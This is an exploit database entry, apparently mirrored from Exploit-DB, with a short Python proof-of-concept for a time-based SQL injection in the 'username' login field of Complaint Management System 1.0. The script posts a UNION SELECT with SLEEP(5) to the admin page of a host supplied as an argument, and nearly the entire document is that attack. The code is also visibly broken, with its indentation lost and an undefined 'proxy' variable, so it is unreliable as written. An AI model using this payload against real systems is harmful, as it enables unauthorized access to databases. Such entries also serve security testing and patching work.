Complaint Management System 1.0 – ‘username’ SQL Injection

  • 作者: Daniel Ortiz
    日期: 2020-05-14
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/48468/
  • # Exploit Title: Complaint Management System 1.0 - 'username' SQL Injection
    # Exploit Author: Daniel Ortiz
    # Date: 2020-05-12
    # Vendor Homepage: https://www.sourcecodester.com/php/14206/complaint-management-system.html
    # Tested on: XAMPP Version 5.6.40 / Windows 10
    # Software Link:https://www.sourcecodester.com/php/14206/complaint-management-system.html
    
    #!/usr/bin/python
    
    import sys
    import requests
    import urllib3
    
    urllib3.disable_warnings(urllib3.exceptions.InsecurePlatformWarning)
    
    def main():
    
    target = sys.argv[1]
    payload = "ADMIN' UNION SELECT NULL,NULL,NULL,SLEEP(5)#"
    url = "http://%s/cms/admin/index.php" % target
    
    print("[+] Target: %s") % target
    print("[+] Injecting payload: %s") % payload
    
    inject(url, payload)
    
    def inject(url, payload):
    
    s = requests.Session()
    d = {'username': payload, 'password': 'admin', 'submit': ''} 
    r = s.post(url, data=d, proxies=proxy)
    
    
    if __name__ == '__main__':
    
    if len(sys.argv) != 2:
    print("(-) usage: %sTARGET" % sys.argv[0])
    print("(-) e.g: %s192.168.0.10" % sys.argv[0]) 
    sys.exit(-1)
    
    main()